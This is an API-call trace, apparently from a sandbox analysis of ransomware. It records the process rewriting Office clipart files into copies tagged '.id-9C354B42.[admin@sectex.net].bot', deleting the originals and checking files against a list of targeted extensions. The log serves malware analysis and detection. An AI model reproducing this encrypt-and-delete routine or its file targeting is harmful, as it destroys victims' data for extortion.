	[0150.539] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4970) returned 1
	[0150.539] CloseHandle (hObject=0x3d0) returned 1
	[0150.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf")) returned 0x20
	[0150.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.541] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.541] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.541] GetLastError () returned 0x0
	[0150.541] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x136a, lpOverlapped=0x0) returned 1
	[0150.543] WriteFile (in: hFile=0x1b8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1370, lpOverlapped=0x0) returned 1
	[0150.544] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.544] WriteFile (in: hFile=0x1b8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.544] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.544] CloseHandle (hObject=0x1b8) returned 1
	[0150.544] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.544] SetEndOfFile (hFile=0x3d0) returned 1
	[0150.547] CloseHandle (hObject=0x3d0) returned 1
	[0150.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf")) returned 1
	[0150.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.847] lstrlenW (lpString=".doc") returned 4
	[0150.847] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.847] lstrlenW (lpString=".docx") returned 5
	[0150.847] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.847] lstrlenW (lpString=".pdf") returned 4
	[0150.847] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.847] lstrlenW (lpString=".xls") returned 4
	[0150.847] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.847] lstrlenW (lpString=".xlsx") returned 5
	[0150.847] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.847] lstrlenW (lpString=".ppt") returned 4
	[0150.847] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.847] lstrlenW (lpString=".zip") returned 4
	[0150.847] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.847] lstrlenW (lpString=".rar") returned 4
	[0150.847] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.847] lstrlenW (lpString=".bz2") returned 4
	[0150.847] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.847] lstrlenW (lpString=".7z") returned 3
	[0150.847] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.847] lstrlenW (lpString=".dbf") returned 4
	[0150.847] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.847] lstrlenW (lpString=".1cd") returned 4
	[0150.847] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.847] lstrlenW (lpString=".jpg") returned 4
	[0150.847] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.848] lstrlenW (lpString=".doc") returned 4
	[0150.848] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString=".docx") returned 5
	[0150.848] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.848] lstrlenW (lpString=".pdf") returned 4
	[0150.848] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString=".xls") returned 4
	[0150.848] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.848] lstrlenW (lpString=".xlsx") returned 5
	[0150.848] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.848] lstrlenW (lpString=".ppt") returned 4
	[0150.848] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.848] lstrlenW (lpString=".zip") returned 4
	[0150.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.848] lstrlenW (lpString=".rar") returned 4
	[0150.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString=".bz2") returned 4
	[0150.848] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString=".7z") returned 3
	[0150.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.848] lstrlenW (lpString=".dbf") returned 4
	[0150.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.848] lstrlenW (lpString=".1cd") returned 4
	[0150.848] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 63
	[0150.848] lstrlenW (lpString=".jpg") returned 4
	[0150.848] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.849] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0150.849] lstrlenW (lpString="J0099145.JPG") returned 12
	[0150.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.849] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=24759) returned 1
	[0150.849] CloseHandle (hObject=0x3e0) returned 1
	[0150.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg")) returned 0x20
	[0150.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.850] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.850] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0150.851] GetLastError () returned 0x0
	[0150.851] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x60b7, lpOverlapped=0x0) returned 1
	[0150.853] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x60c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x60c0, lpOverlapped=0x0) returned 1
	[0150.854] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.854] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.855] SetEndOfFile (hFile=0x3d4) returned 1
	[0150.855] CloseHandle (hObject=0x3d4) returned 1
	[0150.855] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.855] SetEndOfFile (hFile=0x3e0) returned 1
	[0150.857] CloseHandle (hObject=0x3e0) returned 1
	[0150.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.857] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg")) returned 1
	[0150.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0150.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0150.858] lstrlenW (lpString=".doc") returned 4
	[0150.858] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0150.858] lstrlenW (lpString=".docx") returned 5
	[0150.858] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0150.858] lstrlenW (lpString=".pdf") returned 4
	[0150.858] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0150.858] lstrlenW (lpString=".xls") returned 4
	[0150.858] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0150.858] lstrlenW (lpString=".xlsx") returned 5
	[0150.858] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0150.858] lstrlenW (lpString=".ppt") returned 4
	[0150.858] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0150.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0150.858] lstrlenW (lpString=".zip") returned 4
	[0150.859] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0150.859] lstrlenW (lpString=".rar") returned 4
	[0150.859] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0150.859] lstrlenW (lpString=".bz2") returned 4
	[0150.859] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0150.859] lstrlenW (lpString=".7z") returned 3
	[0150.859] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0150.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0150.859] lstrlenW (lpString=".dbf") returned 4
	[0150.859] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0150.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0150.859] lstrlenW (lpString=".1cd") returned 4
	[0150.859] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0151.917] lstrlenW (lpString=".jpg") returned 4
	[0151.917] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0151.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0151.917] lstrlenW (lpString=".doc") returned 4
	[0151.917] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0151.917] lstrlenW (lpString=".docx") returned 5
	[0151.917] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0151.917] lstrlenW (lpString=".pdf") returned 4
	[0151.917] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0151.917] lstrlenW (lpString=".xls") returned 4
	[0151.917] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0151.917] lstrlenW (lpString=".xlsx") returned 5
	[0151.917] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0151.917] lstrlenW (lpString=".ppt") returned 4
	[0151.917] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0151.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0151.917] lstrlenW (lpString=".zip") returned 4
	[0151.917] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0151.917] lstrlenW (lpString=".rar") returned 4
	[0151.917] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0151.917] lstrlenW (lpString=".bz2") returned 4
	[0151.918] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0151.918] lstrlenW (lpString=".7z") returned 3
	[0151.918] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0151.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0151.918] lstrlenW (lpString=".dbf") returned 4
	[0151.918] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0151.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0151.918] lstrlenW (lpString=".1cd") returned 4
	[0151.918] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0151.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 63
	[0151.918] lstrlenW (lpString=".jpg") returned 4
	[0151.918] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0151.918] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0151.918] lstrlenW (lpString="J0099159.WMF") returned 12
	[0151.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0151.919] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=27546) returned 1
	[0151.919] CloseHandle (hObject=0x31c) returned 1
	[0151.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf")) returned 0x20
	[0151.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0151.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0151.920] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.920] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0151.921] GetLastError () returned 0x0
	[0151.921] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x6b9a, lpOverlapped=0x0) returned 1
	[0151.927] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x6ba0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x6ba0, lpOverlapped=0x0) returned 1
	[0151.928] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0151.928] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0151.928] SetEndOfFile (hFile=0x3ac) returned 1
	[0151.929] CloseHandle (hObject=0x3ac) returned 1
	[0151.929] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0151.929] SetEndOfFile (hFile=0x31c) returned 1
	[0151.931] CloseHandle (hObject=0x31c) returned 1
	[0151.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0151.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf")) returned 1
	[0151.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.932] lstrlenW (lpString=".doc") returned 4
	[0151.932] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.932] lstrlenW (lpString=".docx") returned 5
	[0151.932] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0151.932] lstrlenW (lpString=".pdf") returned 4
	[0151.932] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.932] lstrlenW (lpString=".xls") returned 4
	[0151.932] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.932] lstrlenW (lpString=".xlsx") returned 5
	[0151.932] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0151.932] lstrlenW (lpString=".ppt") returned 4
	[0151.932] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.933] lstrlenW (lpString=".zip") returned 4
	[0151.933] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.933] lstrlenW (lpString=".rar") returned 4
	[0151.933] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.933] lstrlenW (lpString=".bz2") returned 4
	[0151.933] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.933] lstrlenW (lpString=".7z") returned 3
	[0151.933] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.933] lstrlenW (lpString=".dbf") returned 4
	[0151.933] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.933] lstrlenW (lpString=".1cd") returned 4
	[0151.933] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.933] lstrlenW (lpString=".jpg") returned 4
	[0151.933] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.933] lstrlenW (lpString=".doc") returned 4
	[0151.933] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0151.933] lstrlenW (lpString=".docx") returned 5
	[0151.933] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0151.933] lstrlenW (lpString=".pdf") returned 4
	[0151.933] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0151.933] lstrlenW (lpString=".xls") returned 4
	[0151.933] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0151.933] lstrlenW (lpString=".xlsx") returned 5
	[0151.933] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0151.933] lstrlenW (lpString=".ppt") returned 4
	[0151.934] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0151.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.934] lstrlenW (lpString=".zip") returned 4
	[0151.934] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0151.934] lstrlenW (lpString=".rar") returned 4
	[0151.934] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0151.934] lstrlenW (lpString=".bz2") returned 4
	[0151.934] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0151.934] lstrlenW (lpString=".7z") returned 3
	[0151.934] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0151.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.934] lstrlenW (lpString=".dbf") returned 4
	[0151.934] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0151.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.934] lstrlenW (lpString=".1cd") returned 4
	[0151.934] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0151.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 63
	[0151.934] lstrlenW (lpString=".jpg") returned 4
	[0151.934] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0151.934] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0151.934] lstrlenW (lpString="J0099160.JPG") returned 12
	[0151.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0151.940] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=15145) returned 1
	[0151.940] CloseHandle (hObject=0x388) returned 1
	[0151.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg")) returned 0x20
